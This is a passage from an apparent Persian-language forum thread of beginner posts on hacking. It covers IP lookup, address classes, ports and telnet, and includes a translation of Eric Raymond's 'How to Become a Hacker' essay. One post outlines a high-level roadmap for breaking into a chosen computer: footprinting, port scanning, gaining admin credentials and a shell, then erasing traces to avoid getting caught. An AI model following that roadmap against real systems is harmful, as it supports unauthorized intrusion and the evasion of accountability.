صفحه عکس بگيريد ( با دکمه Print Screen ) و در يک نرمbافزار گرافيکی بعد از باز کردن يک صفحه خالی به کمک Ctrl+V آنرا مشاهده کنيد. که همان شماره ip برای www.yahoo.com است. نکته بسيار مهم اين است که بهbدليل ضريب اشتباه بسيار بالای آن هيچbگاه از اين روش استفاده نکنيد.
  13. پیدا کردن ip یک سرور : در مرور گر ie internet explorer ادرس را تایپ کنید و enter را فشار دهید در پائین مرورگر یعنی قسمت status bar پس از چند لحظه برای مدت کوتاهیip نمایش داده میشود و میتوانید ان را یادداشت نمائید البته به دلیل ضریب اشتباه بالا این متد زیاد جالب نمیباشد روش بعدی دستور ping را در command prompet صادر کنید ping domain در این حالت میتوانیم ip ان سایت را ملاحظه کنیم روش بعدی و کاملترین روش whois کردن به بعضی سایتهای خاص است در این قسمت یه نرم افزار برای whois براتون میزارم البته روشهای دیگه هم هست مثل سایت های انلاین و ... لینک دانلود نرم افزار whois ----------- تقسیم بندی ادرس ip ادرس های ip به 5 کلاس تقسیم میشوند که a تا e نام دارند ولی از بین انها a.b.c کاربرد عملی دارند کلاس a : اگر ip را بصورت yyy.yyy.yyy.yyy در نظر بگیرید این کلاس تمام ای پی هایی را شامل میشود که *** بین 1 تا 126 است این کلاس برای backbone های بزرگ اینترنتی است و در هنگام ثبتdomain برای گرفتن ip از انها استفاده میشود بنابراین اکثر سایت هایی که چنین ip هایی دارند این کلاس را 8/ هم میگویند کلاس b : این کلاس تمام ip هایی را شامل میشوند که *** بین 128 و 191 است که این کلاس جز کلاس های پر کاربرد است این کلاس را 16/ هم مینامند کلاس c : این کلاس تمام ip هایی را شامل میشوند که *** بین 192 تا 223 است این کلاس معمولا به isp هایی که خدمات dial up ارائه میدهند تعلق میگیرد بنابراین اگر با dial-up به اینترنت وصل شوید چنین ip را میگیرید این کلاس را هم 24/ مینامند ممکن است در این میان این سوال پیش اید که *** چرا نه در کلاس a و نه در b عدد 127 را شامل نمیشود ؟ چون 127 برای کامپیوتر خودمان رزرو شده است مثلا 127.0.0.1 معمولا یعنی لوکال هاست خودمان
  14. 133tچیست ؟ گاهی هکرها در هنگام نوشتن به جای تعدادی از حروف انگلیسی معادل های قرار دادی بکار میبرند مانند زیر : 0<=o 1<+L:I 2<=z 3<=E 4<=A 5<=s 6<=G 7<=T 8<=B و.... که این معادلات فقط برای دانستن و اطلاعات شخص میباشد نه .... ترسیم مسیر برای اینده: اولین و مهمترین تصمیم انتخاب نوع کامپیوتری است که میخواهید هک کنید { کلاینت یا سرور } زیرا روش هک کردن این دو بجز در مراحل ابتدائی کاملا متفاوت است دومین گام انتخاب یک کامپیوتر مشخص { فرضا کامپیوتری که فلان سرور یا سایت را نگه داری میکند } و جمع اوری اطلاعات در مورد ان است این جمع اوری اطلاعات از قربانی را footprinting میگوییم اولین مشخصه که باید کشف شود ای پی اوست . مورد بعدی پیدا کردن نوع سیستم عامل و برنامه هایی که شخص از ان استفاده میکند یکی از مهمترین و گاه خطرناک ترین کارها تست کردن پورتهای ان کامپیوتر برای دیدن باز یا بسته بودن پورتهای ان کامپیوتر است مرحله بعدی شروع تلاش برای نفوذ به سیستم است . این نفوذ سطوح مختلف دارد و بالاترین ان که در کامپیوترهای سرور رخ میدهد حلتی است که بتوان یوزر نیم و پسوورد مربوط به مدیر کامپیوتر یا همان ادمین را به دست اورده و از طریق shell account به نهایت نفوذ دست یابیم ولی گاه به دلایل مختلف نمیتوان به این سطح دست یافت اما برای مراحل بعد بکار برده خواهد شد این مرحله بعد از نفوذ روی میدهد که در ان به یک سطحی از کنترل سیستم رسیده ایم در این مرحله نوع واکنش شما بیانگر نوع هکر بودن شما خواهد شد مرحله بعد پاک کردن رد پا است تا گیر نیافتیم خلاصه مطلب فوق selection->footprinting->pentetration->cleaning
  15. آموزش و ارئه تمام راهکار ها در تلنت Thumbs up2 دستورات cmd در حال ساخت بعد از تکمیل در پارت (1-1) پیوست میشه !
  16. ip شماره ایست که به هر کامپیوتر متصل به اینترنت داده میشود تا بتوان به کمک ان شماره به کامپیوترها دسترسی داشت . این عدد برای کامپیوترهایی که حالت سرور دارند {مانند سایتها } و نیز کامپیوترهای کلاینتی که معمولا به روشی غیر از شماره گیری dial up به اینترنت وصل هستند عددی غیر قابل تغییر و برای دیگران متغییر است یعنی هر بار که شما با شرکت isp خود تماس گرفته و به اینترنت وصل هستید عدیدی جدید به شما داده میشود ممکن است ادرس شما به صورت 195.219.176.** باشد حتی اسمهایی مانند www.yahoo.com که برای اتصال استفاده میکنید در نهایت با ید به یک ip تبدیل شوند تا شما بتوانید سایت یاهو را ببینید در ای پی معمولا *** اولی معنای خاصی دارد که در ادامه به ان خواهیم پرداخت ولی اگر به روش dial up به اینترنت وصل شوید معمولا عدددی که به عنوان *** اول میگیرید مابین 192 تا 223 خواهد بود این توضیح برای تشخیص کامپیوترهای کلاینت از سرور {حد اقل در ایران}بسیار میتواند مفید باشد پورت : در ساده ترین توضیح محلی برای ورود و خروج داده ها میباشد در هک ما معمولا با پورت های نرم افزاری سر و کار داریم که به هر کدام عددی نسبت میدهیم این اعداد بین 1 تا 65535 هستند .معمولا به یک سری از پورت ها کار خاصی را نسبت میدهند و بقیه بصورت پیش فرض هستند و پورت هایی که به صورت فعال هستند توسط نرم افزار خاص مدیریت میشوند مانند پورت 25 برای ارسال ایمیل از میان پورتها 7,15,21,23,25,79,80,110,119, این پورتها مهمترند برای ما و به مرور با انها اشنا میشویم تلنت تلنت معمولا اولین کاری است که یک هکر برای هک کردن یک سایت انجام میدهد زیرا بعضی از پورتها در صورت بسته نبودن روی ان سرور معمولا حاوی اطلاعات مهمی هستند.
  17. زبان c را یاد بگیرید شروع به یاد گیری tcp/ip کنید ( Pdf ) در حال ساخت بعد از تکمیل در پارت (1-1) پیوست میشه !
  18. خوب طی چند پست اول مفاهیم و نکات اولیه رو یاد میگیرم بعد برنامه های مورد نیاز و ... hacker کسی که هدفش از نفوذ به سیستمها خرابکاری و ایجاد اختلال در سیستمهایکامپیوتری است preacker از قدیمیترین هکرها هستند که برای کارشان نیاز و یا دسترسی به کامپیوتر نداشته و کارشان نفوذ به خطوط تلفن برای تماس مجانی و .... انواع کامپیوترهای شبکه server که کارشان تامین اطلاعات در شبکه است مثلا کامپیوترهایی که سایت ها رو نگه میدارند client کامپیوترهایی که استفاده کننده هستند مانند همین کامپیوتری که خودمان روزمره با ان کار میکنیم انواع سیستم عامل هایی که سرورها از ان استفاده میکنند : سیستمهای فعلی unix..... linux,Free bsd ,.... Windows ...xp,7,.... Sun solaris osMac چه چیزهایی برای شروع لازم است ؟ linux , win را روی سیستم نصب و شروع به یادگیری کنید زبان c را یاد بگیرید شروع به یاد گیری tcp/ip کنید و مهمترین مورد علاقه به طی کردن راه طولانی اموزش
  19. پیتر سیباج (Peter Seebach) برای مدیران سیستمی که نمی دانند چطور با هکرها سر کنند، یک FAQ مکمل نوشته است که Hacker FAQ نام دارد. این جا یک سند وجود دارد که How To Be A Programmer (چگونه یک برنامه نویس شویم) نام دارد این یکی از بهترین و کامل ترین هاست. ارزش این مستند فقط مربوط به آموزش کد نویسی نیست، در این سند درباره ی کد نویسی به صورت گروهی و چالش های یک کد نویسی گروهی صحبت شده است. مقاله ای دیگر از Eric Steven Raymond به نام تاریخ اجمالی هکرگری : "A Brief History Of Hackerdom" مقاله دیگری از Eric Steven Raymond برای آشنایی با فرهنگ لینوکس و بازمتن مقاله ای با نام "کلیسای فقید و بازار" یا "The Catedral and the Bazaar". Rick Moen، مقاله ای به نام How to Run A Linux User Group نوشته است. (یک گروه کاربران لینوکس چطور به کار می افتد؟) باز هم از Rick Moen و من (اریک ریموند) مقاله ای به نام چگونه یک سوال هوشمندانه بپرسیم، How to Ask Smart Questions وجود دارد. اگر شما به اطلاعات پیش نیاز برای کامپیوتر های شخصی و شبکه ی اینترنت احتیاج دارید، به مقاله ی The Unix and Internet Fundamentals HOWTO (پایه های یونیکس و اینترنت) مراجعه کنید. اگر شما برنامه ای منتشر می کنید و یا وصله ای برای برنامه ای می نویسید، به Software Release Practice HOWTO (راهنمای تمرین انتشار برنامه ها) سر بزنید.
  20. موقعیت فرهنگ هکر مانند بسیاری از فرهنگ های برپایه ی روابط غیر اقتصادی، هکرگری نیز با شهرت اداره می گردد، شما سعی می کنید که مسئله جالبی را حل کنید اما اینکه آن مسئله چقدر قابل تأمل است یا راه حل شما واقعا چقدر خوب است، چیزی است که تنها استادان شما صلاحیت تأیید آن را دارند. به همین ترتیب، وقتی وارد بازی هکر ها شدید، مدارجتان را با آنچه سایرین در مورد شما فکر می کنند بدست خواهید آورد (به این علت است که تا هنگامی که دیگران شما را هکر نمی دانند واقعأ هکر نیستید). این حقیقت بوسیله پنداری که هک را یک کار منزوی گرایانه می داند، محو شده است؛ هم چنین با وجود این تابوی فرهنگ هکری (که در حال از میان رفتن ولی فعلا همچنان نیرومند است) در برابر پذیرش اینکه تصدیق خود یا دیگری، تنها در گیر انگیزه یک شخص باشد. به خصوص ، هکرگری نوعی از فرهنگ است که مردم شناسان به آن فرهنگ هدیه می گویند. شما شهرت و موقعیت خود را نه با سلطه بر دیگر مردم، نه با زیبایی یا در اختیار داشتن چیزهای مورد نیاز مردم بلکه با دادن هدیه بدست می آورید. به خصوص با دادن وقت خود، خلاقیت و مهارتتان. پنج چیز وجود دارد که با انجام آن مورد احترام هکرها قرار می گیرید: ۱ - برنامه های باز- متن بنویسد اولین (محوری ترین و سنتی ترین) روش، نوشتن برنامه هایی است که هکرهای دیگر آن را جالب و مفید می دانند و سپس دادن کد منبع برنامه ها به دیگران. (ما قبلا این را "نرم افزار آزاد" می نامیدیم ، اما این اصطلاح موجب اشتباه بسیاری از مردم شد که نمی دانستند منظور از آزاد دقیقا چیست، امروزه بسیاری از ما حداقل به نسبت ۲ به۱ اصطلاح "بازمتن" (open-source) را ترجیح می دهیم.) محترم ترین هکر ها [1] افرادی هستند که برنامه های بزرگی نوشته اند - برنامه های پرقدرتی که احتیاجات گسترده ای را مرتفع می سازد - و آنان را در دسترس همگان قرار داده اند. ۲ - به آزمایش ورفع اشکال کردن برنامه های بازمتن کمک کنید هکرها به کسانی که نرم افزارهای بازمتن را آزمایش و رفع اشکال می کنند، یاری میرسانند. در این دنیای ناقص ناگزیر به صرف دقت بسیاری برای رفع اشکال برنامه ها هستم، به این علت است که مولفان بازمتن میگویند یک آزمایشگر خوب ( تعریف کردنش دشوار است؛ مشکلات در ضمن انتشار، کسی که بتواند اشتباهات یک انتشار عجله ای را تحمل کند و مشکلات نرم افزار را گزارش کنند) سزاوار یاقوت به اندازه ی وزنشان هستند. حتی یک نفر از آنان میتواند رفع اشکال کردن را از یک کابوس طولانی به یک دردسر عبرت آموز تبدیل کند. اگر مبتدی هستید یک نرم افزار در حال برنامه نویسی پیدا کنید و یک آزمایشگر خوب باشید. یک پیشرفت طبیعی از کمک به آزمایش برنامه تا کمک به رفع اشکال کردن آن و بهتر کردن آن است. از این راه چیزهای بسیاری یاد می گیرید و روابط خوبی با افرادی که بعدا شما را کمک خواهند کرد بر قرار خواهید کرد. ۳ -اطلاعات خوب را منتشر کنید کار خوب دیگری که می توانید بکنید جمع آوری و دستچین کردن مطالب جالب و مفید در برگه های وب یا پرونده هایی مانند سؤالات متداول ( FAQ ) و منتشر کردن آن است. گردآورندگان مجموعه سؤالات متداول (FAQ) به اندازه برنامه نویسندگان بازمتن مورد احترام هستند. ۴ -به پایداری شالوده ی کار کمک کنید فرهنگ هکر (و مهندسی اینترنت بعنوان شاخه ای از آن) با داوطلبان به پیش می رود. بسیاری از کارهای کوچک ولی ضروری وجود دارند که باید انجام شوند. مدیریت لیست های پستی و گروههای خبری، مرتب کردن آرشیو نرم افزارهای بزرگ، گسترش RFCها و سایر استانداردهای فنی. مردمی که این کارها را انجام می دهند مورد احترام فراوان هستند. چرا که همه می دانند این نوع مسئولیت چقدر زمانبر است در حالیکه جذابیت زیادی مانند بازی کردن با کد هم ندارد. انجام آنها نشاندهنده ی ایثارگریست. ۵ - به خود فرهنگ هکر کمک کنید در انتها می توانید به خود فرهنگ کمک کنید و آن را منتشر کنید (مثلأ با نوشتن مقاله ای در مورد اینکه چگونه هکر شویم :-) ). گرچه این کاری نیست که در همان ابتدا انجام دهید تا وقتی که شهرت خوبی در بین هکرها بدست آورید. فرهنگ هکر، رهبر به معنی دقیق آن ندارد. اما قهرمانان، پیران ، مورخان و سخنگویان زیادی دارد. بعد از این که به اندازه ی کافی در سنگرها مدت زیادی را سپری کنید، می توانید یکی از آنها شوید. باید بدانید که هکرها به منیت آشکار پیران خود بدبینند؛ رسیدن به این درجه از شهرت آشکارا خطرناک است. به جای تلاش برای رسیدن به آن موقعیتتان را چنان بسازید که در مسیرشما افتد. سپس در مقامتان فروتن و مهربان باشید. رابطه ی هکر / نرد “Nerd” ارتباط هکر و نرد بر خلاف افسانه مشهور، برای هکر بودن اجباری بر نرد بودن نیست (نرد به شخصی گفته می شود که تمام زندگی او بر کامپیوتر/تکنولوژی استوار است -مترجم -). اما به هرحال نرد بودن کمکتان می کند و بسیاری از هکرها اینگونه اند. نرد بودن کمکتان می کند که بر مهمترین مسائل مانند فکر کردن و هک کردن تمرکز داشته باشید. به همین خاطر بسیاری از هکرها صفت نرد بودن و حتی سرسختانه تر 'geek' را به عنوان شعار برگزیده اند. روشی برای بیان جداییشان از انتظارات عوامانه اجتماع - برای بحث بیشتر به صفحه ی geek مراجعه کنید. اگر شما بتوانید به اندازه کافی روی هک کردن تمرکز کنید در حالیکه به زندگیتان هم برسید، بسیار عالیست. امروزه انجام این کار از ۱۹۷۰ که من تازه کار بودم بسیار ساده تر است؛ جریان غالب فرهنگی با تکنو- نردها بسیار مهربانتر است و تعداد کسانی که می فهمند هکرها عاشقان و همسران بلند مرتبه ای هستند هر روز زیادتر می شود. اگر شما بخاطر نرد بودنتان به هکر بودن علاقه مند شده اید هم خوب است! حداقل برای متمرکز شدن مشکلی نخواهید داشت. شاید هم در آینده از انزوا درآمدی! نکاتی در باب طریقت نکاتی در باب طریقت باز می گویم که شما برای هکر شدن باید ساختار فکری هکری بدست آورید. چیزهایی هست که هنگامیکه کامپیوتر ندارید می توانید انجام دهید. آنها جایگزین هک کردن نمی شوند (هیچ چیز نمی شود) اما بسیاری از هکرها انجامشان را دوست دارند و احساس می کنند با انجام آنها به نوعی به روح هک کردن نزدیک می شوند. -بیاموزید که زبان مادریتان را خوب بنویسید. گرچه معروف است که برنامه نویس ها نمی توانند بنویسند، یک تعداد غافلگیر کننده ای از هکرها (تمام بهترین هکرهایی که من می شناسم) نویسندگان توانایی هستند. -داستانهای علمی - تخیلی بخوانید. به جلسات داستانهای علمی بروید. (جای خوبی که می توانید هکرها و هکر دوستان را ببینید.) -ذن تمرین کنید و/ یا به هنرهای رزمی بپردازید (انظباط روحی در جهات بسیاری شبیهاند) -گوش تان را به موسیقی حساس کنید. بیاموزید که به نوع خاصی از موسیقی را درک کنید. نواختن برخی آلات موسیقی را به خوبی فرابگیرید یا آواز خواندن یاد بگیرید. -کار با جملات قصار و بازی با کلمات را به خوبی بیاموزید. هر چه موارد بیشتری را قبلأ انجام داده باشید استعداد بیشتری برای هکر شدن دارید. چرا این موارد خاص مهم هستند واقعا معلوم نیست. ولی ارتباط آنها با مهارتهای نیمکره ی چپ و راست مغز مربوط می شود، هردوی این ها اهمیت فراوانی دارند؛ هکرها همانگونه که به منطق استدلالی نیاز دارند به شهود عرفانی نیز محتاجند تا در لحظه ای خاص از شر منطق ناقص مشکلی خلاص شوند. به همان میزان که بازی می کنید، کارکنید و همان قدر که کار می کنید، بازی کنید. برای هکر های واقعی مرزی میان ” بازی“ ، ” فعالیت“ ، ”دانش“ و ”هنر“ وجود ندارد و این با پدیدار شدن سطح بالایی از سرزندگی سازنده همراه خواهد بود. به هیچ وجه به اطلاعات مهارت های محدود اکتفا نکنید. برخلاف آن که بسیاری از هکرها خود را یک برنامه نویس معرفی می کنند، دارای مهارت های بسیاری هستند - مدیریت سیستم، طراحی وب و رفع اشکال های سخت افزاری PC یکی از معمول ترین آن هاست. هکری که مدیر سیستم است، اغلب، یک برنامه نویس حرفه ای و یک طراح وب است. هکر هرگز کاری را نیمه انجام شده رها نمی کند، اگر به موضوعی بپردازد در رابطه با این موضوع مهارت هایش را به اوج کمال می رساند. در پایان چیزهایی هستند که نباید انجام دهید: -از اسامی ابلهانه و بزرگ نما (قلمبه!) استفاده نکنید. -در آتش افروزیهای گروه های خبری و یا هر بحث بی فایده ی دیگر شرکت نکنید. -خودتان را "ولگرد سایبر" خطاب نکنید، وقت خود را با چنین افرادی هدر نکنید. -نامه های الکترونیکی پر از غلط املایی و دستور زبانی نفرستید. تنها چیزی که از این ها عایدتان می شود شهرت یک دلقک است. هکرها حافظه خوبی دارند - سالها طول می کشد تا دسته گلی که به آب داده اید فراموش شود و مورد قبول واقع شوید. بر مشکل نام های کاربری یا اسامی مستعار باید تاکید کنم. پنهان کردن نام واقعی پشت رموز، کار ابلهانه و بچه گانه کرکر ها(crackers) و warez d00dz ویا دیگر فرم های پیش پا افتاده ی زندگیست. اگر نام مستعاری دارید آن را دور بیاندازید. در میان هکرها این حقیقتا باعث می شود تا شما را به فراموشی بسپارند. هکران از آنچه که انجام می دهند مغرورند و آن را وابسته به نام حقیقی خود می خواهند.
  21. مهارت های پایه ای برای هکر شدن منش هکر حیاتی است اما مهارت او حیاتی تر است. منش جایگزین مهارت نمی گردد و مجموعه مهارت های پایه ای خاصی وجود دارند که باید در خود بپرورانید تا هکرها شما را هکر بنامند. این ابزار به آرامی تغییر میکند با گذشت زمان تکنولوژی مهارت های جدیدی ایجادمی کند و قدیمی ها را بی مصرف میکند. مثلا در گذشته زبان ماشین شامل این مجموعه بود، در حالیکه HTML اخیرا به این مجموعه اضافه شده است. اما این مجموعه در حال حاضر مشخصأ شامل موارد زیر است: ۱ - بیاموزید که چگونه برنامه بنویسید. این مسلما پایه ای ترین مهارت هکر است. اگر شما هیچ زبان برنامه نویسی بلد نیستید، پیشنهاد می کنم با پیتون شروع کنید. پتیون تمیز طراحی شده است. به خوبی مستند سازی شده و تقریبأ ابتدایی است. با آنکه پتیون زبان اولیه خوبی است، یک اسباب بازی نیست. بلکه بسیار قدرتمند و قابل انعطاف است و مناسب پروژه های بزرگ. من یک مقاله مفصل تر در مورد انقلاب پیتون نوشته ام. خودآموزهای خوبی می توانید در وب سایت پیتون پیدا کنید. جاوا زبان بسیار خوبی است البته بسیار مشکل تر از پیتون است، اما برنامه سریع تری ایجاد می کند و فکر می کنم انتخاب فوق العاده ای برای زبان دوم است . البته شما نمی توانید با دانستن تنها دو زبان به مهارتهای یک هکر و یا حتی یک برنامه نوبس خوب برسید. شما باید بدانید چگونه در مورد مشکلات برنامه نویسی، جدای از زبان برنامه نویسی فکر کنید. برای آنکه یک هکر واقعی شوید، باید به جایی برسید که بتوانید یک زبان جدید را در دو، سه روز یاد بگیرید. این نیازمند آن است که چندین زبان کاملأ متفاوت را یاد بگیرید. اگر به صورت جدی به برنامه نویسی روی آورید، باید C زبان پایه ایUnix را یاد بگیرید. ++C بسیار شبیه C است؛ اگر شما یکی از آنها را یاد بگیرید، یادگرفتن دیگری مشکل نخواهد بود. اما هیچ کدام به عنوان زبان اول قابل یادگیری نیستند. در واقع، هر چقدر از برنامه نویسی به زبان C پرهیز کنید، بازده تان بیشتر خواهد بود. C بسیار کاراست و منابع کامپیوتر را کمتر مصرف می کند. متأسفانه C این کارایی را با تلاش بسیار شما برای مدیریت سطح پائین منابع (مانند حافظه) بدست می آورد. این نوع برنامه نویسی سطح پائین بسیار پیچیده و باگ -دوست است و زمان بسیاری برای رفع اشکال (Debug) لازم دارد. با قدرت و سرعتی که کامپیوترهای امروز دارند این معامله خوبی نیست. تیز هوشانه تر است که از زبانی استفاده کنیم که زمان کامپیوتر را بیشتر می گیرد و زمان برنامه نویس را کمتر. مانند ، پیتون. زبانهای دیگری هستند که ارزش خاصی برای هکرها دارند. http://www.perl.com/Perl به جهت دلایل کاربردی آن با ارزش است، به طور گسترده ای در طراحی صفحات فعال وب و مدیریت سیستم به کار گرفته شده است و حتی اگر شما هرگز با Perl برنامه ننوبسید، باید قادر به خواندن آن باشید. بسیاری از مردم از Perl در جایی استفاده می کنند که من پیتون را پیشنهاد کردم. برای اجتناب از برنامه نویسی C در جاهایی که نیاز به کارایی C ندارید. شما به فهمیدن کدهای Perl احتیاج خواهید داشت. لیسپ (LISP)به دلایل دیگری ارزشمند است – برای روشن نگری عینی که پس از یادگیری آن بدست خواهید آورد . حتی اگر هیچگاه از لیسپ به طور جدی استفاده نکنید، مسلما یادگیری آن شما را برنامه نویس بهتری خواهد کرد. (شما می توانید مهارت های اولیه ی LISP را به راحتی بانوشتن و تغییر دادن Modها برای ویرایشگر متن Emacs کسب کنید) حقیقتا بهتر است هر پنج زبان ( پیتون ، جاوا ، C/++C ، پرل و LISP) را یاد بگیرید. جدا از ارزشی که این زبانها برای هکرها دارند، آنان رویکردهای کاملا متفاوتی برای برنامه نویسی دارند که مسا ئل با ارزشی به شما یاد می دهند. نمی توانم دستورالعمل خاصی برای یادگرفتن برنامه نویسی بدهم (کار پیچیده ای است)، اما می توانم بگویم که کتاب ها و کلاسها به شما کمک نخواهند کرد (اکثر هکرها خودشان یاد گرفته اند) شما می توانید روشهایی را از کتاب فراگیرید اما ساختار فکری که این روشها را به مهارت واقعی تبدیل می کند، تنها با تمرین و شاگردی کردن بدست می آید. وظایف شما شامل ۱) خواندن کد و ۲) نوشتن کد خواهد بود. یادگیری زبان برنامه نویسی مانند یادگیری نوشتن یک زبان واقعی است. بهترین راه خواندن چیزهایی است که استادان امر نوشته اند و سپس نوشتن برنامه ای از خودتان است؛ بسیار بیشتر مطالعه کنید، کمی بیشتر بنویسید، بیشتر مطالعه کنید، بیشتر بنویسید.... و تا آنجا ادامه دهید که نوشته هایتان قدرت و صلابت کارهای استادتان را پیدا کند. سابقا پیدا کردن کد خوب مشکل بود، برنامه های بزرگی که متن آنها در دسترس بود تا هکرها بخوانند و آزمایش کنند، بسیار محدود بود. اکنون این مسئله به طور قابل ملاحظه ای تغییر کرده است؛ اکنون نرم افزارها ابزارهای برنامه نوبسی و سیستمهای عامل بازمتن (که تماما بوسیله هکرها نوشته شده است) بسادگی قابل دسترس است - که مرا به نوشتن بخش بعد ترغیب می کند... ۲ - یکی از یونیکس های باز-متن را بگیرید و استفاده و اجرا کردن آن را بیاموزید. فرض می کنیم یک کامپیوتر شخصی دارید یا لااقل به آن دسترسی دارید (بچه های امروزی خیلی راحت به آن دسترسی دارند:-)). مهمترین قدم اولیه ای که هر مبتدی برای هکر شدن می تواند بردارد، گرفتن یک کپی از لینوکس (Linux) یا بی اس دی-یونیکس (BSD-Unix)؛ نصب کردن آن روی کامپیوتر شخصی و اجرای آن است. بله ، سیستم عاملهای فراوانی در کنار یونیکس وجود دارد. اما تمام آنها به صورت باینری توزیع می شوند و شما قادر به خواندن و تغییر کد آن نیستید. تلاش برای ایجاد تغییر بر روی یک کامپیوتر داس یا ویندوز یا MacOS مانند این است که بخواهید در لباس شوالیه رقص بیاموزید. تحت OS/X این کار ممکن است ، اما فقط بخشی از این سیستم بازمتن است. شما به موانع بسیاری برخورد خواهید کرد و باید مواظب باشید تا عادت بد تکیه بر کد اختصاصی اپل را در خود توسعه ندهید. در صورتی که بر روی یونیکس ها تمرکز کنید، چیزهای مفیدتری فراخواهید گرفت. یونیکس سیستم عامل اینترنت است. اگر اینترنت را بدون یونیکس یاد می گیرید، هیچ وقت نمی توانید یک هکر اینترنت باشید. به این خاطر فرهنگ هکر امروز کاملأ یونیکس-محور است. (این مطلب همیشه صادق نبوده است . بسیاری از هکرهای با سابقه از این موضوع رضایت ندارند اما پیوند محکم یونیکس و اینترنت آنچنان قوی است که حتی قدرت شیطانی مایکروسافت نیز نتوانسته است خلل چندانی در آن ایجادکند.) پس یک یونیکس نصب کنید. من به شخصه لینوکس را دوست دارم اما راههای دیگری هم وجود دارد ( بله! شما می توانید مایکروسافت ویندوز و Linux رابا هم داشته باشید). یاد بگیرید، اجرا کنید، ور بروید، کدهایش را بخوانید و تغییرشان دهید. ابزار برنامه نویسی بهتری در اختیار خواهید داشت، مانند C , LISP , Python و Perl که در سیستم عامل ویندوز خواب داشتن آن ها را می بیند. بسیار جذاب و سرگرم کننده خواهد بود و آنچنان در دانش غرق میشوید که حتی متوجه آن نمی شوید تا هنگامیکه به مانند یک استاد هکر به پشت سرتان بنگرید! برای اطلاعات بیشتر درباره ی یادگیری Unix به The Loginataka نگاه کنید. همین طور شمامی توانید نگاهی بهThe Art Of Unix Programing (هنر برنامه نویسی در یونیکس) بیاندازید. برای آن که چیز هایی از لینوکس دست گیرتان شود به سایت Linux Online بروید؛ شما می توانید از آن جا دانلود کنید یا (ایده ی بهتر) یک گروه کاربران لینوکس محلی پیدا کنید تا به شما در نصب لینوکس کمک کنند. از دیدگاه یک کاربر تازه کار تمام توزیع های لینوکس بسیار شبیه یکدیگرند. شما می توانید راهنما و منابعBSD Unix را در سایت www.bsd.org پیدا کنید. من نیز مقالاتی مبتدی درباره ی پایه های یونیکس و لینوکس نوشته ام. (توجه : من در حقیقت نصب کردن هیچ کدام از Linux یا BSDها را به طور خاص به شما توصیه کنم ، برای هر تازه کاری هر کدام از این ها یک پروژه ی انفرادی است. برای لینوکس، یک گروه کاربران لینوکس در محل خود پیدا کنید و از آنها برای کمک سوال کنید.) ۳ -استفاده از وب و نوشتن HTML را یاد بگیرید. بسیاری از چیزهایی که فرهنگ هک ساخته است خارج از افق دید شماست، کمک به کارخانه ها، دفاتر و دانشگاه ها بدون اینکه تأثیر مشخصی در زندگی غیر هکرها نداشته باشد. در این میان اینترنت یک استثناء عمده است، سرگرمی درخشان هکری که حتی به اعتراف سیاست مداران در حال تغییر دادن جهان است . تنها به همین خاطر (و همچنین بسیاری از دلایل مشابه دیگر) یاد گرفتن کار در اینترنت احتیاج دارید. این فقط به این معنی نیست که چگونه از یک مرورگر استفاده کنید(!) بلکه به معنی یادگیری HTML است . اگرهنوز برنامه نویسی یاد نگرفته اید، نوشتن HTML عادت های ذهنی را برایتان فراهم می کند که به یادگیری برنامه نویسی کمک می کند. پس برای خودتان یک Homepage درست کنید. سعی کنید از XHTML استفاده کنید که نسبت به HTML سنتی تمیزتر است.(منابع بسیار خوبی برروی وب برای تازه کارها وجوددارد؛ این یکی از آن هاست!) اما نوشتن یک Homepage به هرحال آنقدر خوب نیست که شما را هکر کند. وب پر از Homepage است. بیشترشان بی ارزشند. لجن های بی محتوا، فضولات شیک، اما مطمئن باشید که لجن همیشه لجن است. (برای اطلاعات بیشتر صفحه یTheHTML Hell را ببینید.) برای با ارزش بودن؛ Homepage تان باید محتوا داشته باشد و برای هکرهای دیگر جذاب و یا آموزنده باشد. تمام اینها شمارا به بخش بعد هدایت می کند... ۴ -اگر انگلیسی بلد نیستید آن رایاد بگیرید. به عنوان یک آمریکایی بخاطر آنکه زبان مادریم انگلیسی است قبلأ از ذکر این موضوع ناراحت بودم. حداقل این می تواند یک امپریالیسم فرهنگی تلقی گردد. ولی تعدادی از غیر انگلیسی زبانان از من خواستند که این موضوع را متذکر شوم که انگلیسی زبان فرهنگ هکر و اینترنت محسوب می گردد و شما احتیاج خواهید داشت که این زبان را یادبگیرید تا در جامعه هکرها فعال شوید. این موضوع واقعیت دارد. حدود سال ۱۹۹۱ متوجه شدم که بسیاری از هکرها که انگلیسی زبان دومشان بود آن را برای بحث های تکنیکی شان بهره می گرفتند، حتی اگر زبان مادریشان یکی بود. به من اطلاع دادند که انگلیسی بعلت غنی تر بودن به لحاظ لغات فنی برای این کار مناسب تر است . به همین دلیل ترجمه متن های فنی که در زبان انگلیسی هستند، غالبا رضایت بخش نیست. لینوس توروالدز که یک فنلاندی است، کد خود را به زبان انگلیسی تشریح کرده است (و هرگز غیر از این روش، روش دیگری را پیش نگرفته است) تسلط بر انگلیسی، عامل مهمی در جمع کردن جامعه جهانی برنامه نویسان لینوکس بوده است. این مورد نمونه قابل ذکری در مورد نقش زبان انگلیسی است.
  22. چگونه میتوان هکر واقعی شد ؟, راهی سخت و طولانی اما ممکن برای هکر شدن ! امیدوارم با این پست دیگر شاهد این سوال از طرف تازه کارها نباشیم . این مقاله که ترجمه شده مقاله آقای Eric Steven Raymond هست که خیلی از فعالان اینترنتی این مقاله رو به زبان فارسی ترجمه کردند . این مقاله ترجمه آقای آرش بیژن زاده هست که عیناً براتون کپی میکنم . اریک ریموند (Eric Steven Raymond) می گوید: چگونه یک هکر شویم؟ بخش اول هکر (hacker) چیست؟ پرونده اصطلاحات(Jargon File) شامل تعاریفی از' هکر' است که عموما در ارتباط با تعریف تکنیکی آن همراه با وصف سرخوشی حل مشکلات و مرتفع کردن محدودیت هاست. اگر شما می خواهید بدانید چگونه هکر شوید تنها دو تعریف به دردتان می خورد. یک اجتماع ، یک فرهنگ مشترک ، از برنامه نویسان خبره و جادوگران شبکه که پیشینه آن از میان دهه ها به مینی کامپیوترهای اشتراک زمانی (time-sharing) و اولین تجریه های ARPAnet می رسد. اعضای این فرهنگ اصطلاح ' هکر' را ساختند . هکرها اینترنت را ایجاد کردند. آنان سیستم عاملUnix را آنچنان که امروز هست ایجاد کردند. هکرها usenet را اجرا کردند. آنان باعث شدند شبکه جهانی (World wide web) کار کند. اگر شما دارای این فرهنگ هستید و دیگران می دانند که شما چه کسی هستید و هکر می نامندتان؛ پس شما هکر هستید! نگرش هکر محدود به 'هکر نرم افزار' نمی شود ، مردمانی هستند که منش هکر را به سایر زمینه ها مانند الکترونیک یا موسیقی سرایت می دهند. در حقیقت شما می توانید این فرهنگ را در بالاترین سطوح هر علم و 